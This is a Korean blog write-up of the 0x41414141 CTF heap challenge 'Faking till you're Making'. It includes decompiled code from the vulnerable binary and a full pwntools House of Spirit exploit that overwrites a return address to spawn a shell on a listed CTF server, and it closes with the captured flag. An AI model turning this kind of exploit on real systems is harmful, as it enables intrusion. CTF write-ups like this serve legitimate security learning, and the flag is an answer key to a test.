-
[0x41414141 CTF] Faking till you're MakingCTF/WRITEUP 2021. 2. 2. 19:42
Disassembly 디스어셈블리
#!/bin/bash `pwd`/PoW if [ $? == 0 ]; then echo "\n" `pwd`/vuln fimain.sh는 PoW 이후 vuln을 실행한다.
undefined8 main(void) { void *buf; undefined auStack88 [64]; char *s; void *ptr; setvbuf(_reloc.stdout, 0, 2, 0); printf(0x200c, sh); malloc(1); read(0, &buf, 0x50); ptr = auStack88; free(ptr); s = (char *)malloc(0x30); fgets(s, 0x404, _reloc.stdin); return 0; }vuln은 함수 sh의 주소를 출력하고, 스택 영역의 주소를 free한 뒤 malloc으로 할당된 메모리에 fgets로 0x404 바이트 만큼 입력받는다.
void sh(void) { system("/bin/sh"); return; }
PIE, NX Enabled 보호기법으로는 NX와 PIE가 걸려 있다.
House of Spirit
Code
더보기from pwn import * from hashlib import sha256 from itertools import product from string import ascii_lowercase from tqdm import tqdm def PoW(): res = (p.recvline().strip()[-6:]).decode() for x in tqdm(product(ascii_lowercase, repeat=4)): d = "" for i in x: d += i y = sha256(d.encode()).digest().hex() if y[-6:] == res: log.info("key : " + d) p.sendline(d) p.recvline() break binary = "./vuln" lib = "./libc-2.32.so" server = "185.172.165.118" port = 2929 # context.log_level = 'debug' context.binary = binary if True: p = remote(server, port) PoW() else: p = process(binary) gdb.attach(p) e = ELF(binary) r = ROP(e) l = ELF(lib) e.checksec() def send_payload(payload): log.info("payload = %s" % repr(payload)) p.sendline(payload) f = FmtStr(send_payload, offset = 1) sh = int(p.recv(14), 16) log.info("sh : " + hex(sh)) payload = p64(0) payload += p64(0x40) payload += p64(0)*7 payload += p64(0x30) p.send(payload) payload = b"\x90"*0x58 payload += p64(sh) p.sendline(payload) # raw_input(1) p.interactive()Flag
flag{seems_h0us3_0f_sp1r1ts_w0rks_0n_2.32_then_58493}
'CTF > WRITEUP' 카테고리의 다른 글
[DiceCTF 2021] babyrop (0) 2021.02.06 [0x41414141 CTF] Babyheap (0) 2021.02.03 [0x41414141 CTF] Moving signals (0) 2021.02.02 [0x41414141 CTF] echo (0) 2021.02.02 [0x41414141 CTF] Return Of The ROPs (0) 2021.02.02